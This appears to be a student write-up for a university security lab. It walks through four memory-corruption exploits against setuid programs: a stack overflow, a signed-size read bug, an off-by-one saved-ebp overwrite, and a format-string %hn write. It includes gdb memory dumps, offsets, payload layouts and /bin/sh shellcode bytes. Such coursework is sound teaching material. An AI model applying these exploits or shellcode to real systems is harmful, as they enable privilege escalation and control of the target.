## Q1. “Behind the Scenes”
The function ``deja_vu()`` declared and called in program dejavu has a character buffer that gets initialized from user input, imposing a stack overflow vulnerability which an attacker can take advantage of. With the exploit script Neo provided, we can feed the program dejavu with a carefully designed buffer that overwrites the return address of function `deja_vu()` and inject code into memory above deja_vu’s stack frame. The goal is to make it such that when `deja_vu()` returns, the program is redirected to execute our injected code. Since the program exploit has its setuid bit set to be owned by the user of the next stage, Smith, the injected code is running at Smith's access level.
To apply this plan and exploit the program, we need to first determine the offset between the return address and the buffer we are attacking. This is effectively the address of the instruction immediately following function call to `deja_vu()`. Disassembling the code shows that this address should be where `0xb7ffc4ce` is stored as the return address when executing function deja_vu's.
Now let the program continue to execute function `deja_vu()`. Exam the memory and we figured the address to overwrite(`0xb7ffc4d3`) is stored at `0xbffffa88+8=0xbffffa90`, which is 5 words(20 bytes) away from the beginning of buffer door at `0xbffffa78`. With that, we assemble a buffer that first fill out the stack frame with arbitrary values, then overwrites the return address to one unit beyond where the return address is stored(which evaluates to `0xbffffa90`), and injected the shellcode there. Notice that x86 has little-endian byte code, the return address replacement 0xbffffa90 should be inverted.
After feeding this input to program dejavu, we are able to run dumb-shell with Smith's access level, and obtained his user name and password.
The screenshot below shows the memory layout during exploit. The return address `0xb7ffc4d3` is replaced with `0xbffffa90` where the shellcode takes place.
## Q2. Compromising Further
The agent-smith program has a bug around line 16-18. The first character to read, which is supposed to represent the number of characters to read to the buffer msg, is assigned to the 8-bit signed integer size. However, if size is initialized to a negative number, the following if statement won’t detect it. And when a negative size is parsed into `fread()`, it is cast into a large integer which allows a stack smash attack. An attacker can overwrite the return address using buffer msg, inject malicious code and let the program jumps to execute the injected code.
The return address is essentially the address of the line after calling `display()` in `main()`, which
We inspect the stack frame in `display()` using gdb:
The saved eip tells us the return address we want to overwrite is 0x400775.
This address is stored at `0xbffffa58+4(bytes)`, which is `4*9+1=37` words away from the head of the buffer msg.
We inject the shellcode right after the replacement for the return address, therefore the return address should be modified to `0xbffffa58+8=0xbffff60`.
With these information, we’re ready to prepare an input buffer and launch the attack. This input begins with `37 words = 148 chars` to fill the space between &msg and , then overwrite the return address to 0xbffff60, and dump the shellcode. To determine the first character, we calculate the size of the buffer needed, which is `148 + 4(new return address) + 39(shellcode) = 191`. The unsigned binary representation of 191 is `10111111`. Therefore the leading character should be `\xbf`.
Below is the frame info and stack layout showing our attack in process. The return address is modified as planned.
## Q3
The for loop in function flip() allows index i to go from 0 up to 64, which makes it possible to overwrite the last byte of the previous frame's ebp stored above buffer. To exploit this program, we need to:
- Inject shellcode into memory and know the address.
- Construct a buffer of length = 65, which must (1), replace the last byte of a stored ebp with the last byte such that ebp register will contain an address residing in the buffer when it's recovered, and (2) replace the content of that address with the address of our shellcode.
The shellcode can be injected using environment variable ENV. We used gdb to find address of the injected code, which is 0xbfffff8f. This is the address we want the program to jump to.
```
(gdb) info variables environ
All variables matching regular expression "environ":
File src/env/__environ.c:
char **__environ;
(gdb) x/s *((char **)__environ)
0xbffffbfe: "SHLVL=1"
(gdb) x/s *((char **)__environ+2)
0xbfffff8b: "ENV=j1X̀\211É\301jFX̀1\300Ph//shh/binT[PS\211\341\061Ұ\v̀"
(gdb) x/s *((char **)__environ+2)+4
0xbfffff8f: "j1X̀\211É\301jFX̀1\300Ph//shh/binT[PS\211\341\061Ұ\v̀"
```
Notice that function flip will flip one bit of every character in the buffer, this address is converted to 0x9fdfdfaf accordingly as showed below:
```
original: b'1011 f'1111 f'1111 f'1111 f'1111 f'1111 8'1000 f'1111
1001 1111 => 9f
1101 1111 => df
1101 1111 => df
1010 1111 => af
```
Inspecting the address space in executing function flip(), we find the previous frame's ebp content is stored at address 0xbffffa20.
```
(gdb) x/20xw buf
0xbffff9e0: 0x00000000 0x00000001 0x00000000 0xbffffb8b
0xbffff9f0: 0x00000000 0x00000000 0x00000000 0xb7ffc44e
0xbffffa00: 0x00000000 0xb7ffefd8 0xbffffac0 0xb7ffc165
0xbffffa10: 0x00000000 0x00000000 0x00000000 0xb7ffc6dc
0xbffffa20: 0xbffffa2c 0xb7ffc539 0xbffffbbd 0xbffffa38
```
The buffer is constructed by concatanating 64 repeating ` 0xafdfdf9f` and one ending character `\04` used to replace the last byte of stored `ebp` content. After `flip()` returns, we can tell from the gdb output that the buffer is successfully filled with the shellcode address, and the stored ebp value at `0xbffffa20` is also modified as expected.
```
(gdb) x/20xw buf
0xbffff9e0: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffff9f0: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffffa00: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffffa10: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffffa20: 0xbffffa04 0xb7ffc539 0xbffffbbc 0xbffffa38
```
Run ./exploit and we got access to the next stage.
## Q4
The `printf()` function in `oracle()` takes user input as its argument, imposing a format string vulnerability. Since `printf` uses the format string to determine the number of arguments, the attacker can pass in a number of format specifier and gain access to stack memory. `printf` also has a feature using `%hn` specifier that allows the number of characters written to ouput so far to be stored at a certain memory. With that, we can pass in the shellcode in buffer and overwrite the return address to where the address of the shellcode.
We first figured the address of `printf`'s argument:
```
pwnable:~$ cat e1
#!/bin/bash
echo -n -e "AAAA%x %x %x %x %x %x %x"
pwnable:~$ ./e1 | ./oracle
AAAA1 20 40063c 0 280 180 41414141
```
which is 7 address away from `printf()`.
We then found that the return address is stored at `0xbffffa8c` using `gdb`. This is the address we will write to.
```
(gdb) s
oracle () at oracle.c:4
4 {
(gdb) info frame
Stack level 0, frame at 0xbffffa90:
...
ebx at 0xbffffa84, ebp at 0xbffffa88, eip at 0xbffffa8c
```
To avoid writing way too many characters to the standard output, we write the lower half of shellcode address to `0xbffffa8c` and then the higher half to `0xbffffa8c+2=0xbffffa8e`. We also need a palceholder between these two address because a number of characters must be written in between the two numbers, which corresponding to the lower and higher address of the shellcode, are written. This is necessay to make up the difference of the two numbers. The input string should take the form of `<ret address>%o%o<ret address+2><shellcode>%o%o%o%00000x%hn%00000x%hn`
Now we can find the shellcode address, which is `&string+3*4=0xbffffa38`:
```
Breakpoint 1, oracle () at oracle.c:9
9 }
(gdb) x/24xw &string
0xbffffa2c: 0xbffffa8e 0x6f256f25 0xbffffa8c 0xcd58316a
0xbffffa3c: 0x89c38980 0x58466ac1 0xc03180cd 0x2f2f6850
0xbffffa4c: 0x2f686873 0x546e6962 0x8953505b 0xb0d231e1
0xbffffa5c: 0x2580cd0b 0x256f256f 0x3030256f 0x78303030
0xbffffa6c: 0x256e6825 0x30303030 0x68257830 0x0000006e
0xbffffa7c: 0xfe96c04d 0x00000000 0xb7ffcf5c 0xbffffa98
```
And we can calculate the offset. `bfff=>49151`, `fa38=>64056`. We would have to write `49151-63=49188` more characters to write `bfff`, and `64056-49151=14905` more characters to write `fa38`.
Inspect stack space after filling in these two offsets and sending this input string to the exploit program, we can see the address that stores the return address is correctly overwriten to where shellcode is.
```
(gdb) x 0xbffffa8c
0xbffffa8c: 0xbffffa38
(gdb) x/39x 0xbffffa38
0xbffffa38: 0x6a 0x31 0x58 0xcd 0x80 0x89 0xc3 0x89
0xbffffa40: 0xc1 0x6a 0x46 0x58 0xcd 0x80 0x31 0xc0
0xbffffa48: 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f
0xbffffa50: 0x62 0x69 0x6e 0x54 0x5b 0x50 0x53 0x89
0xbffffa58: 0xe1 0x31 0xd2 0xb0 0x0b 0xcd 0x80
```